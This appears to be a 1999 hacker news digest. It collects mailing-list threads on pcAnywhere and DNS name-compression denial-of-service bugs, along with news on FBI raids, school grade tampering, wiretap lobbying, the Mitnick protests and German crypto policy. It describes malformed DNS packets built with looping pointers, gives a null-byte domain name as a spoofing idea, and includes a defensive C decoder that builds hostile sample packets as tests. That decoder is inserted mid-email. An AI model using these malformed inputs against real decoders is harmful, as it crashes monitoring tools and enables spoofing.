To make it short, a permanent DoS failed with a Win98 attacker's machine though generating quite some load to the host's 486 CPU ;-) Pheww...because this keeps us safe from about 99% of all attacks ;)

Further difference: After pressing 'Enter' (unlike in the NT4.0 attack, where you lose connection) you are prompted for a Username and password.... Could this be due to different possible Host Type options in Telnet (VT 52 on the Win98 vs. VT 100 on NT 4.0)? In this case, could this also be the reason for the different reaction to the attack?

Comments?
In case this one gets through, thank you for your time.

Jay.

P.S.: Does anyone know about the release date of the German NT 4.0 Service Pack 5? I couldn't get information on that via the German or U.S. Web-Site.

-----------------------------------------------------------------------------

Date: Mon, 31 May 1999 13:34:34 +0200
From: Craig Hind
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: DoS against PC Anywhere

Hi,

I managed to replicate this and checked Symantec's FTP site. There is a new aw32tcp.dll there dated May 26, 1999. I got it and patched one of my machines and it seems to work, although the description of the file on ftp.symantec.com/public/english_us_canada/products/pcanywhere/pcanywhere32/ver8.0/updates does not mention a denial of service.

Regards
Craig

> -----Original Message-----
> From: Chris Radigan [mailto:radigac@CERF.NET]
> Sent: Friday, May 28, 1999 21:02
> To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
> Subject: DoS against PC Anywhere
>

@HWA

27.0 weaknesses in dns label decoding, denial of service attack (code included) (fwd)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml

Date: Sun, 30 May 1999 17:16:22 +0200 (CEST)
From: Sebastian
To: packetstorm@genocide2600.com
Subject: weaknesses in dns label decoding, denial of service attack (code included) (fwd)
Parts/Attachments:
   1 Shown     87 lines  Text
   2          1.8 KB     Application, "zlip.tar.gz"
----------------------------------------

keywords: some dns packet decoders (sniffers, ids systems (?), dns servers) may be vulnerable to malformed compressed domain names inside dns packets.

hi,

as I played with the DNS RFC (1035 especially) i came up with the idea to create malformed compressed dns domains inside the DNS packet to make it impossible for the DNS packet decoder to decompress it, which might lead to a denial of service attack.

On my tests I found my BIND servers resisting all attacks (three different types), but all sniffers I used to view the DNS packets sent to the server behaved in a very "special" way.

First test (pointing-to-itself-compression (zlip-1.c))

The DNS domain consists of multiple labels, and message "compression" allows you to let a pointer point to a previous label inside the packet, to save bytes in the DNS packet. I just created a pointer that points to itself, meaning on a recursive domain decompression (like Ethereal uses), this will produce effects like segfaulting or hanging. Ethereal alloc's memory until the system crashes, tcpdump stopped working before the packet is received, on SIGINT, it displays the malformed packet, but dropped all other packets:

    14:57:59.025013 128.75.9.2.48078 > victim.ns.org.domain: 30993 Type49159 (Class 49168)?

Second test (crossreferencing pointers (zlip-2.c))

Similar to the first code, but now two pointers are used to reference each other, speeding up the effect on Ethereal. Results are the same as in the first test.
Third test (very long label, decompressed multiple times (zlip-3.c))

This time I used a long label (maximum of 63 characters), and referenced to it a dozen times, this will decode to a very long domain, therefore it may overflow some fixed-sized-buffers (because the rfc says "limited to 500 characters" some programmers may prefer fixed buffers for dns decoders). This is the case in Ethereal, where such a request creates a segmentation fault (due to a buffer overrun).

I just tested this with BIND as nameserver, which resisted all these tests, but I included the "exploit" code in this email to allow you to test your IDS, sniffers and nameservers against this.

cu,
scut

-- - scut@nb.in-berlin.de - http://nb.in-berlin.de/scut/ - sacbuctd@ircnet --
-- you don't need a lot of people to be great, you need a few great to be --
-- the best -----------------------------------------------------------------

[ Part 2, "zlip.tar.gz" Application/X-GUNZIP 2.4KB. ]

------------------------------------------------------------------------------------

Date: Mon, 31 May 1999 17:49:53 -0400
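The three malformed-compression cases in the post above (a pointer to itself, two pointers referencing each other, and a long label expanded past any sane name length) are all failures of the decoder, so the following is an added example, not code from the post or from zlip.tar.gz, of an RFC 1035 name decoder that refuses each of them. The function names, error codes and sample messages are constructed for illustration; bytes outside printable ASCII, a zero byte included, are escaped as \DDD so the resulting C string cannot be cut short.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define DNS_HDR_LEN  12   /* names never start inside the fixed header */
#define DNS_MAX_NAME 255  /* RFC 1035 limit for a whole name on the wire */
#define DNS_MAX_HOPS 32   /* backstop; the backward-only rule already bounds hops */
enum { DNS_E_TRUNC = -1, DNS_E_PTR = -2, DNS_E_HOPS = -3,
       DNS_E_LEN = -4, DNS_E_TYPE = -5, DNS_E_BUF = -6 };

/* Decode the name at msg[off] into out as an escaped, NUL-terminated string.
 * Returns the bytes the name occupies at off (> 0) or a negative DNS_E_* code;
 * on error the contents of out are unspecified. Iterative on purpose, so
 * hostile input cannot drive recursion depth. */
int dns_name_decode(const uint8_t *msg, size_t msg_len, size_t off,
                    char *out, size_t out_len)
{
    size_t pos = off, limit = off, wire = 1, o = 0;   /* wire counts the root byte */
    int consumed = 0, hops = 0;
    for (;;) {
        if (pos >= msg_len) return DNS_E_TRUNC;
        uint8_t len = msg[pos];
        if ((len & 0xC0) == 0xC0) {                   /* compression pointer */
            if (pos + 1 >= msg_len) return DNS_E_TRUNC;
            size_t target = ((size_t)(len & 0x3F) << 8) | msg[pos + 1];
            if (!consumed) consumed = (int)(pos + 2 - off);
            /* Strictly backward only: rejects self, forward and mutual references. */
            if (target < DNS_HDR_LEN || target >= limit) return DNS_E_PTR;
            if (++hops > DNS_MAX_HOPS) return DNS_E_HOPS;
            pos = limit = target;
            continue;
        }
        if (len & 0xC0) return DNS_E_TYPE;            /* reserved label types */
        if (len == 0) {                               /* root label ends the name */
            if (!consumed) consumed = (int)(pos + 1 - off);
            break;
        }
        if ((size_t)len > msg_len - pos - 1) return DNS_E_TRUNC;
        wire += (size_t)len + 1;
        if (wire > DNS_MAX_NAME) return DNS_E_LEN;    /* refuse before copying */
        for (size_t i = 0; i < len; i++) {
            uint8_t c = msg[pos + 1 + i];
            int plain = c > 0x20 && c < 0x7F && c != '.' && c != '\\';
            size_t need = plain ? 1 : 4;              /* others become \DDD */
            if (o + need + 2 > out_len) return DNS_E_BUF;   /* + '.' and NUL */
            if (plain) out[o++] = (char)c;
            else o += (size_t)snprintf(out + o, 5, "\\%03u", (unsigned)c);
        }
        out[o++] = '.';
        pos += (size_t)len + 1;
    }
    if (o == 0) {                                     /* the root name itself */
        if (out_len < 2) return DNS_E_BUF;
        out[o++] = '.';
    }
    out[o] = '\0';
    return consumed;
}

/* ---- Constructed sample messages (built here, not captured traffic) ---- */
char demo_out[1100];
static int put_label(uint8_t *m, int at, int fill, int n)
{ m[at] = (uint8_t)n; memset(m + at + 1, fill, (size_t)n); return at + 1 + n; }
static int put_ptr(uint8_t *m, int at, int target)
{ m[at] = (uint8_t)(0xC0 | (target >> 8)); m[at + 1] = (uint8_t)target; return at + 2; }

int demo_self_pointer(void)      /* pointer at offset 12 that targets 12 */
{
    static const uint8_t m[14] = { [12] = 0xC0, 12 };
    return dns_name_decode(m, sizeof m, 12, demo_out, sizeof demo_out);
}
int demo_cross_pointers(void)    /* 12 -> 14 and 14 -> 12, decoded from 14 */
{
    static const uint8_t m[16] = { [12] = 0xC0, 14, 0xC0, 12 };
    return dns_name_decode(m, sizeof m, 14, demo_out, sizeof demo_out);
}
int demo_long_expansion(void)    /* 63-byte labels chained by legal pointers */
{
    uint8_t m[400] = {0};
    int prev = 12, start = 12, at = put_label(m, 12, 'a', 63) + 1;  /* +1: root */
    for (int i = 0; i < 4; i++, prev = start) {
        start = at;
        at = put_ptr(m, put_label(m, at, 'b' + i, 63), prev);
    }
    return dns_name_decode(m, (size_t)at, (size_t)start, demo_out, sizeof demo_out);
}
int demo_valid(void)   /* label 'a',0x00,'b' then a pointer to "example.com" at 12 */
{
    static const uint8_t m[] = { 0,0,0,0,0,0,0,0,0,0,0,0,
        7,'e','x','a','m','p','l','e', 3,'c','o','m', 0, 3,'a',0,'b', 0xC0, 12 };
    return dns_name_decode(m, sizeof m, 25, demo_out, sizeof demo_out);
}

int main(void)
{
    printf("self=%d cross=%d long=%d\n", demo_self_pointer(),
           demo_cross_pointers(), demo_long_expansion());
    if (demo_valid() > 0) printf("valid: %s\n", demo_out);
    return 0;
}
```

The length check runs on the wire-format total before any byte is copied, so the over-long expansion is refused even though every individual pointer in it is legal.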
From: bobk
To: BUGTRAQ@netspace.org
Subject: Re: weaknesses in dns label decoding, denial of service attack (code included)

On Sun, 30 May 1999, Sebastian wrote:

>
> keywords: some dns packet decoders (sniffers, ids systems (?), dns
> servers) may be vulnerable to malformed compressed domain names
> inside dns packets.
>
> sorry aleph1, if this has already been known or posted =)
>
>
> hi,
>
> as I played with the DNS RFC (1035 especially) i came up with the idea to
> create malformed compressed dns domains inside the DNS packet to make it
> impossible for the DNS packet decoder to decompress it, which might lead
> to a denial of service attack.

Another thing to remember is that it is possible to put ABSOLUTELY ANYTHING inside a DNS domain name. This includes whitespace, control characters, and even NULL.

Imagine what could happen if some program did a strcmp() on the following name:

    rs.internic.net\0.xa.net

where, of course, \0 is a null

Interested readers may ponder what type of programs may be exploited with this type of attack.

@HWA

28.0 Microsoft Worker Raided
     ~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Code Kid

VallaH, one of the victims of the recent FBI raids, was a contractor for Microsoft working on Windows 2000 interoperability. Although he was not arrested and charges have not been filed against him he still lost his job. This of course raises the question of who is working where? Do employers really know the backgrounds of their employees? Is there any way to tell?

MSNBC
http://www.msnbc.com/news/275876.asp

Perils of moonlighting as a hacker

Microsoft employee was raided by FBI last week; are hackers working all over the software industry?

By Bob Sullivan
MSNBC

June 2 — Everybody does it; nobody wants to talk about it. Computer hackers — “white hat” or “black hat” — are among the brightest minds in the software industry, so many are hired by big-name software companies.
Then they dance the awkward dance of dual identities, engineer by day, hacker by night. The consequences of a misstep in that dance can be severe, as a hacker calling himself “VallaH” learned last week. In his case, a visit from the FBI meant the end of his career at Microsoft, embarrassment for the largest software company in the world, and a new focus on the role of hackers at work.

JEFFREY ROBERSON, 19, was a self-described “angry little kid” two years ago, fairly well-known as VallaH on the hacking scene, dabbling in writing hacker software tools. At his worst, he says, he participated in relatively benign “denial-of-service” attacks — coordinated efforts to try to overwhelm a Web site with hits so it becomes unavailable.

Then a Microsoft employee saw his programming code, was duly impressed and invited VallaH to Redmond, Wash. Over time, Roberson was convinced to put his skills to good use and took the job. He’s spent the past year working on Windows 2000, testing for interoperability with Unix systems — his specialty. (Note: Microsoft is a partner in MSNBC.)

But he also stayed involved in the hacker “scene.” He says he hadn’t done anything illegal since taking his job at Microsoft; in fact he says he spent his time trying to convince other “angry little kids” that they could be creative instead of destructive.

“I talked to them because I wanted to try to help them program.”

But someone passed his “handle” to the FBI recently. Then his Seattle-area apartment was raided May 26 in the hacker sweep, and VallaH’s life instantly changed. He was immediately fired by Microsoft and went back home to his parents in the Baltimore area.

I’M ASHAMED THEY’RE INVOLVED

“Some people who had absolutely nothing to do with hacking at all [were raided]. “People with things going for them, innocent people, who are going to face consequences. — JEFFREY ROBERSON

“It’s Microsoft policy; I understand where they’re coming from,” Roberson said of his dismissal.
He was actually a contractor at Microsoft, working through the Volt Computer agency. “I’m more of a liability than an asset.... I owe a great debt to Microsoft, and I’m really ashamed that they’re involved.”

Are other “hackers” working at Microsoft? Does the company recruit in the underbelly of the Internet, places like Internet Relay Chat rooms set up for hackers? The company wouldn’t say.

“We don’t recruit people who are involved in illegal activities,” spokesman Adam Sohn said. “But did one computer scientist see [VallaH’s code] and thought, gee, this is ... great work, we should get this person? Surely that may happen.”

Other software firms wouldn’t discuss company policies about hiring hackers when contacted for this article — but hackers say the practice is common and complicated.

IT’S ONLY NATURAL

“It is only natural to assume that someone who defaces Web pages at night also works for a computer-related company,” said a man calling himself Space Rogue. Rogue works for L0pht Heavy Industries, a company of “professional hackers” that is hired by firms to test corporate system security.

“Last place I worked I tried to keep my involvement with L0pht and stuff quiet. Then word got around, as it always does. Then I get treated like royalty, and people tell me all the dirty deeds they have done to the company systems. Back doors, reading the boss’s e-mail, all kinds of s***. I just shake my head and wonder.

“The issue is most employers have no idea what the background is of their employees. I mean, it’s not like you’re going to put ‘defaced 150 Web sites’ on your resume. And unless you have been arrested, no background check is going to turn anything up.”

FIND A HOLE, GET A JOB

On the other hand, exposing security holes in front of the world is even better than a resume, said Russ Cooper, who moderates the most popular information service covering Windows NT security. His NTBugTraq mailing list has 25,000 subscribers, and his Web site gets 2 million hits a month.
“The issue is most employers have no idea what the background is of their employees. I mean, it’s not like you’re going to put ‘defaced 150 Web sites’ on your resume.” — SPACE ROGUE, L0pht Heavy Industries

“A lot of people release exploit information to get jobs,” Cooper says. Posting an exploit, or a security hole, to his list is one sure way to get the attention of software firms. “Certainly I know of people who have posted and gotten job offers. Companies are interested in people who have demonstrated an aptitude for discovering problems. Finding people with skills is hard.”

But is it worth the risk? No, says Christopher Klaus, who founded Internet Security Systems Inc. The company writes software designed to automatically test for exploitable security holes, so-called scanning software. For ISS software to work, his programs must imitate the thought process of hackers — still Klaus says he ignores the resumes he gets from hackers.

“We find we have more success finding people with a networking background, people who know Unix and can program in C++, then train them in security. That works better than the other way around,” he said.

HAVING A HACKER ON STAFF

“What’s more fun than a buddy’s reaction when the CD-drive door is opened mysteriously. :) ” — CARL-FREDRIK NEIKTER

Having a hacker on staff is complicated because of the vague distinctions often made between “white hat,” “black hat,” hackers and crackers. Anyone involved in computer security might be called a hacker (in fact, many say anyone involved in any kind of programming is a hacker). Computer security administrators consider hacker mailing lists, Web pages and even chat rooms as part of their daily reading material, a requirement for keeping their systems secure against the latest exploits.

And there’s all manner of playful “hacking” that goes on inside a company. One Microsoft employee told MSNBC that groups within the company sometimes hack each other’s Web pages, a harmless form of taunting.
But when does that kind of playfulness cross the line, become harmful? Many hackers don’t believe temporarily defacing a Web page is destructive, though it is illegal. But what of the authoring of hacker “tools,” which are not illegal?

For example, there are software packages used to scan Web sites for vulnerabilities; they are equally useful to security administrators testing their own systems and hackers looking for open doors.

Other software simply makes it easy for someone who’s less skilled to hack into Web sites. That’s what Roberson was writing when Microsoft contacted him — he was one of many coders who write and distribute software that can be used to crack Web sites, then share it with a wink, saying they’re not responsible for how others use it.

HACKING TOOLS

Among the most popular examples is NetBus, which allows a hacker to control a victim’s PC from anywhere on the Internet, right down to opening and closing the CD-ROM door. Its author, Carl-Fredrik Neikter, said he wrote NetBus “solely to have a fun program. What’s more fun than a buddy’s reaction when the CD-drive door is opened mysteriously. :) I didn’t think about trojans or a hacking tool.” He’s now trying to market the tool as commercial shareware.

Others who write such tools say they’re doing it to draw attention to security holes — that was the motivation behind Back Orifice, written by members of the Cult of the Dead Cow, according to member Sir Dystic.

While writing such software is not illegal, it’s also not the kind of moonlighting many companies would be proud of. But how much control does a company have over its employees’ activity outside of work?

FACING CONSEQUENCES

According to Roberson, his Microsoft employers knew he came “from the scene,” even knew he still communicated with hackers. Only the embarrassment of the raid cost him his job — and he now regrets his past as a hacker.

“I wish I didn’t talk to these people,” he said.
“But I grew up in the scene, it was all I knew, it was who I was.” So he felt an obligation to keep up friendships and “help these kids.”

But in the end those friendships cost him his job — and, says Roberson, others involved in the raids are facing similar consequences.

“Some people who had absolutely nothing to do with hacking at all [were raided],” he said. “People with things going for them, innocent people, who are going to face consequences.” He says others raided last week got in trouble with school officials and employers but declined to elaborate.

Such consequences — and even threats of prosecution and computer seizure made by the White House, CIA and FBI — don’t seem to be deterring many hackers, who on Wednesday continued to deface government Web sites.

@HWA

29.0 Is the FBI Missing the Point?
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by McIntyre

With the focus of the FBI squarely on web page defacers are more serious criminals being overlooked? Are Scr1pt Kiddies really who the FBI should be worried about? Or should they be searching for cyber crooks whom you do not hear about, that stay in the shadows?

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2269398,00.html

30.0 Norwegian Newspaper Cracked
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by luyten

Two 17 year olds were arrested in their home by Norwegian police. Both of them have admitted to defacing the web page of Norway's biggest newspaper "Aftenposten". They replaced the main page with a graphic of three men urinating on the newspaper's logo. The defaced page was visible for approximately one and a half hours. Both suspects risk getting a criminal record and being sued for a large amount of money from Aftenposten and Scandinavia Online (SOL) for their alleged losses.
Aftenposten - Sorry it is in Norwegian
http://www.aftenposten.no/nyheter/nett/d84153.htm

HNN Cracked Pages Archive
http://www.hackernews.com/archive/crackarch.htm

31.0 Student Busted for Changing Grades
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by riot

Students at Evergreen High School in Washington state paid a fellow student, Adam Jerome, $5 each to change their grades on the school computer. Mr. Jerome now faces a possible charge of computer trespass in the first degree, a Class C felony, for which a first time offender can receive as much as 90 days in jail. The purchasers of the grades, one of whom was the principal's daughter, may be charged with being accomplices to a computer trespass. (I'm not even going to get into all the FUD and inaccuracies in this article)

The Columbian
http://www.columbian.com/06021999/front_pa/60760.html

HACKING SUSPECT MAY BE CHARGED

Wednesday, June 2, 1999
By TOM VOGT and RICHARD S. CLAYTON, Columbian staff writers

It could be the fantasy of many computer-savvy students: hacking into the school's data system and changing your grades.

Now prosecutors are considering charges against an Evergreen High School student accused of using his home computer to raise grades for 22 classmates.

Twenty-three students were disciplined. One was expelled, one was placed on long-term suspension, and the rest received 10-day suspensions.

The incident coincided with increasing national attention to computer security in the wake of high-tech vandalism against computers or Web sites in the FBI, the U.S. Senate, the Department of the Interior and a federal supercomputer laboratory in Idaho.

The expelled student is senior Adam Jerome, who was responsible for the hacking, according to a district source.

The computer hacking affected "the integrity of the whole system: kids working hard to earn grades," Evergreen Principal Jim Hudson said Tuesday.
Art Curtis, Clark County prosecutor, said his office is studying the case and will decide whether to file charges in the next week or so.

The charge would be computer trespass in the first degree, a Class C felony. For a first offender, the maximum sentence is 90 days in jail.

Kirby Neumann-Rea, district spokesman, said each student paid $5 to have grades inflated. They might face charges of being accomplices to a computer trespass, Curtis said.

One of the students is Katy Hudson, daughter of the Evergreen principal.

At least one student used the grade boost to get a scholarship, Curtis said.

"This is not just a prank," Curtis said. "If there is an issue of a potential scholarship, there is a concern."

Some students received credit for courses they never took.

District officials said computer security has been upgraded since the incident. The school's computers are part of a system used by 262 districts in the state.

The hacking started in February. When a teacher heard about the grade boosts, school officials investigated in April and confronted the students.

"All the kids came clean," Hudson said, and that included the computer expert.

"He sat down with us and gave us a complete rundown," Hudson said.

The district also forwarded correct information to colleges for the students involved.

All the seniors will graduate, although Jerome will not go through the graduation ceremony.

Evergreen School District School operates its own computer information system, which maintains student grades as well as other records. Evergreen's system is separate from the regional data center maintained by Educational Service District 112.

All but one other Clark County district (tiny Green Mountain) uses the ESD's center to secure student grades and other records.

The ESD is unaware of any hackers illegally entering its system in recent years, said Marge Cartwright, the ESD's director of communications and information management.
Cartwright knows of two attempts to hack into the ESD's data center. Both were unsuccessful.

"We feel confident in the security of the system," Cartwright said. "We haven't had a problem with students breaking into it. I'm not concerned about that."

To access the ESD's system, a user or hacker would need more than several passwords and a confidential user name. They also would have to navigate more than one "firewall." One of these firewalls limits access by allowing only specific computers at specific schools to enter, Cartwright said.

Cartwright said she was unaware how the student allegedly entered Evergreen's system, but could also have used "sniffer" software that helps decipher passwords and codes.

@HWA

32.0 FBI Lobbying Group Pushes for EavesDropping Capability
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by s3cr3t

The International Law Enforcement Telecommunications Seminar (ILETS), a reportedly top secret international lobbying group made up of police officers and security agents from around the world, will attempt to convince New Zealand's government that it needs to filter the Internet. ILETS was founded by the FBI in 1993 to push for wiretap abilities in worldwide communications and has been heavily involved with the ENFOPOL 98 Affair

IDG News
http://www.idg.co.nz/nzweb/dfca.html

Telepolis
http://www.heise.de/tp/english/special/enfo/6398/1.html

Monday May 31

Lobby group pushes for Police email snooping

NZ Police refuse to comment

By Paul Brislen - AUCKLAND

An international lobby group aims to convince New Zealand's government that it should implement laws requiring Internet service providers (ISP) to allow law enforcement officers access to anyone's email.

The lobby group, the International Law Enforcement Telecommunications Seminar (ILETS), is made up of police officers and security agents from a number of Western countries including New Zealand and Australia. Hong Kong is also included.
Set up in 1993 by the FBI to push building universal wiretap-ability into worldwide communications, ILETS now has its sights firmly set on tapping into the Internet and may have convinced a meeting of European ministers to adopt its latest plan.

ILETS plans to lobby New Zealand's government to introduce similar laws here, although the minister's press secretary, Jonathan Kinsella, says he has not heard of ILETS.

NZ Police refuse to comment

"That sounds more like an operational matter. That would be handled by national headquarters."

New Zealand Police does have a representative in ILETS but he would not comment on ILETS or its role in New Zealand.

"It's all supposed to be top secret. I'm surprised you got hold of the name even," he says. He describes ILETS as an "advisory group" and feels that monitoring of Internet communication is a "worldwide trend" of which New Zealand is only a part.

New Zealand law does not allow such interceptions to take place here and our strict privacy laws would also cause ILETS some trouble. However, the group will be pushing the issue at a political level.

Enfopol 19, the document currently before the European council of ministers, requires manufacturers and operators to build in "interception interfaces" to the Internet and all future digital communications systems. Under the scheme, European ISPs would be required to install monitoring equipment or software on site. The European governments would then have the capability to track an individual's "static and dynamic IP address . credit card number and email address", according to the leaked Enfopol 19 document, available at the Foundation for Information Policy Research's (FIPR) Web site (www.fipr.org).

FIPR, which describes itself as "an independent body that studies the interaction between information technology and society", is based in the UK and has been following ILETS since its cover was blown by the German online publication Telepolis.
In the UK, opposition from ISPs is growing.

"Anything along the lines [of the ENFOPOL scheme] would probably have astronomical cost implications," says Keith Mitchell, chairman of the London Internet Exchange. "In the event such a scheme was ever implementable, the costs should be met by the enforcement authorities. Since the industry cannot afford it I doubt the public sector could."

Mitchell doubts whether such a scheme would work on a technical level, something that Telecom is also concerned about.

"The amount of email going through Xtra's email servers is around five times the volume it was last year and it's accelerating," says spokesman Glen Sowry. Telecom has recently installed a new email server which is scalable up to a million users. "At this stage you would have to take into consideration the sheer volumes of what you are trying to achieve."

European ministers are to meet on May 27 to discuss the adoption of Enfopol 19.

More information can be found at: www.heise.de/tp/english/special/enfo/default.html.

@HWA

33.0 Cons, Cons and more Cons
     ~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Space Rogue

Several hacker conventions are either just around the corner or in early planning stages. Hope 2000, the third incarnation of the famous Hackers On Planet Earth do not have an official date or location yet, but they do have a webpage and it will probably be one of the biggest Hacker Conventions ever. DNSCON is shooting for its second year; to be held in Blackpool, England. WraithCon is planning on Kent University. Hit2000 has finally announced a date in September. And don't forget the old standbys Defcon, Summercon and others that are just around the corner.

HNN Cons Page
http://www.hackernews.com/cons/cons.html

@HWA

34.0 Friday June 4th: FREE KEVIN Demonstrations Today!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Macki

At approximately 2pm local time on Friday, June 4th, people will gather outside at least 16 Federal Courthouses across the country to protest the continued incarceration of Kevin Mitnick. The demonstrations hope to bring attention to the fact that

- Kevin has been denied a bail hearing
- Lack of access by the defense to critical evidence
- The outrageous claims by software companies as to the amounts of damages caused by copying software.
- When this was reported by the media the court blocked access to the defense to further information.

Kevin Mitnick has never been accused of being violent, malicious, or getting any sort of compensation for his acts and yet he has been in jail for over four years. Longer than most armed robbers or rapists. It is hoped that these peaceful demonstrations can increase public awareness of this issue and hopefully positively influence his sentencing hearing scheduled for June 14th.

Official Press Release
http://www.hackernews.com/orig/mitnickpr.html

FREE KEVIN Demonstrations
http://www.2600.net/demo/

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2269826,00.html

Salon
http://www.salon.com/tech/log/1999/06/04/mitnick/index.html

Already over, the demonstration in front of the US Embassy in Moscow has been labeled a huge success. This photo taken prior to the event shows some folks from Civil Hackers' School in Moscow and a conspicuously placed FREE KEVIN Sticker.

Moscow Demonstration Picture
http://www.hackernews.com/images/kewl4.html

The demonstration in Washington DC is going to try like hell to webcast the event but their resources are limited. You can try here or here. Hopefully one of them will work.

http://www.SteveNet.net/2600/
http://members.xoom.com/gmontag/

There are rumors that several of the demonstrations, especially the one in Atlanta which is the first event of Summercon, will be broadcast live on CNN.
We will do our best to bring you updates as necessary.

http://www.summercon.org/

Late Update

The Philadelphia demonstration is also attempting to web cast their event. We should hopefully have a URL for you soon. Demonstrations are also happening spontaneously in cities that are not listed on the official web page. HNN has received reports of a demonstration taking place in Boston.

FOR IMMEDIATE RELEASE

NATIONWIDE DEMONSTRATIONS ON FRIDAY TO PROTEST HACKER INCARCERATION

NATIONWIDE CONTACT: Emmanuel Goldstein, 917-945-26ØØ

On Friday, June 4 at 2 pm, demonstrations will take place outside federal courthouses nationwide to protest the continued incarceration of Kevin Mitnick, imprisoned without bail in a pre-trial facility in Los Angeles for over four years.

The demonstrations are being organized by the FREE KEVIN movement and seek to shed light on the many injustices of this case. They include:

--) Mitnick's denial of a bail hearing, something even a terrorist is given.

--) The inability of Mitnick's defense to have access to the evidence against him, making it impossible for them to mount an adequate defense.

--) The highly dubious claims of certain cellular phone companies in letters obtained by us which state that Mitnick's mere glancing at their source code cost them hundreds of millions of dollars. These losses were never reported to their stockholders as required by the SEC.

--) When the media started to report on these disclosures, the court's response was to prevent any further documentation from being released.

Throughout this ordeal, Mitnick has never been accused of doing anything malicious, profiting in any way from his talents, or being a violent criminal. Yet, since February 15, 1995 he has been locked away with some of the most dangerous people around.

Our demonstrations will take place to spread the word and put pressure on the appropriate authorities to end this nightmare once and for all.
Even those who think Mitnick is guilty of everything he's been accused of are outraged by his continued incarceration. On June 14, the judge in his case will have the option of recommending his immediate release to a halfway house or extending his prison term even longer.

For more information on the Mitnick case, check www.freekevin.com. For more information on the demonstrations, contact one of the above people or check www.2600.com/demo.

@HWA

35.0 Germany Frees Crypto
~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Seraphic Artifex

German officials have released a statement on crypto policy. The statement says that for the worldwide protection against electronic interception and economic espionage that the strongest crypto available will be allowed to be used by German citizens. In addition the crypto development community within Germany will be supported and nurtured to create superior crypto products. The statement claims that the need of personal privacy and the protection of e-commerce overrides any possible use crypto may have for criminals.

German cryptography policy statement
http://www.bmwi.de/presse/1999/0602prm1.html

English Translation
http://jya.com/de-crypto.htm

Wired
http://www.wired.com/news/news/politics/story/20023.html

Wired;

Germany Endorses Strong Crypto
Wired News Report

5:20 p.m. 3.Jun.99.PDT

In an apparent response to corporate spying allegedly conducted in Europe by the United States, Germany is encouraging citizens and businesses to use strong cryptography.

"[Germany] considers the application of secure encryption to be a crucial requirement for citizens' privacy, for the development of electronic commerce, and for the protection of business secrets," reads a translated version of a policy framework document released Wednesday by Germany's Federal Ministry of Economic Affairs and Technology.

"The federal government will therefore actively support the distribution of secure encryption.
This includes in particular increasing the security consciousness of citizens, business, and administration."

Australia recently became the first nation to admit it participates in Echelon, a previously secret global surveillance network capable of intercepting electronic communications anywhere in the world.

Echelon is said to be principally operated by the United States' National Security Agency and its UK equivalent, the Government Communications Headquarters. In addition to Australia, the system relies on cooperation with other signals-intelligence agencies in Canada and New Zealand.

Earlier this month, UK investigative journalist Duncan Campbell submitted Interception Capabilities 2000, his report on Echelon, to the European Parliament's Science and Technology Options Assessment Panel.

Campbell had been asked to investigate the system in the wake of charges made last year in the European Parliament that Echelon was being used to funnel European government and industry secrets into US hands.

In the wake of the report, the Australian government confirmed the Echelon alliance to media in follow-up interviews.

Though Wednesday's German government statement does not mention Echelon, the document alludes to the specter of industrial espionage.

"For reasons of national security, and the security of business and society, the federal government considers the ability of German manufacturers to develop and manufacture secure and efficient encryption products indispensable," the statement said.

The government added that it would take additional measures to strengthen its domestic crypto software industry.

The policy also cautioned that while encryption may be used to criminal ends, the need to protect electronic commerce overrides any such concerns. The department said it would prepare and release a report on the criminal uses of cryptography within two years.
The US government restricts the export of strong crypto on the grounds that it might be used by terrorists and hostile nations to conceal communications.

-=-

Policy statement;

Federal Ministry of the Interior
Federal Ministry of Economic Affairs and Technology

Bonn, June 2, 1999

Cornerstones of German Encryption Policy

The Federal Cabinet in its session of June 2 agreed on the German position on the use of cryptographical methods in e-commerce in the form of “Cornerstones of German Encryption Policy”.

The government followed the necessity to take position in this nationally and internationally vital question important for business and e-commerce. Security problems are on the rise with growing traffic on the net. Experts are estimating the losses caused by espionage, manipulation, or damaging of data by billions. Data security is becoming a serious issue with global competition and because of that is affecting jobs in respective businesses.

Improved protection of German users on the net by means of better encryption methods is the main concern of this decision. It states clearly that cryptographic methods and products are furthermore permitted to be developed, produced, and used without any restrictions.

The yet low awareness towards this issue shall be raised by this decision. The initiative “Security On The Net” by ministries of economic affairs and interior is meant to serve the same purpose.

Another main aim of the German federal government is to strengthen productivity and international competitiveness of the German suppliers in encryption business which are likely to intensify their efforts with regards to a growing demand.

The further opening of the European single market is serving the same purpose: Germany together with its European partners abolished supervision of encryption mass products exported within the EU by revising the EU-dual-use-decree.
Simplification of export supervision procedure are under examination by the Bundesausfuhramt (federal export agency?).

With the use of cryptography on the rise improper use can’t be ruled out. Therefore the involved ministries will be watching further development thoroughly and deliver a report after 2 years. Efforts to improve the technical equipment of law enforcement agencies are underway.

With this well-balanced position the federal government met the requirements for Germany being a secure and productive site in the information age.

Cornerstones of German Crypto Policy

Introduction

Hard- and software for message encoding remained until the beginning of the nineties a negligible niche market. However this niche market is now of considerable importance to the economic and social development in the information age. The input ”information” is developing more and more into a much demanded raw material. Effectively protecting this asset can be crucial to corporate success and thus determine on prospective employment. This protection today can be effectively ensured only by use of strong encryption tools.

Controversy on encryption in Germany

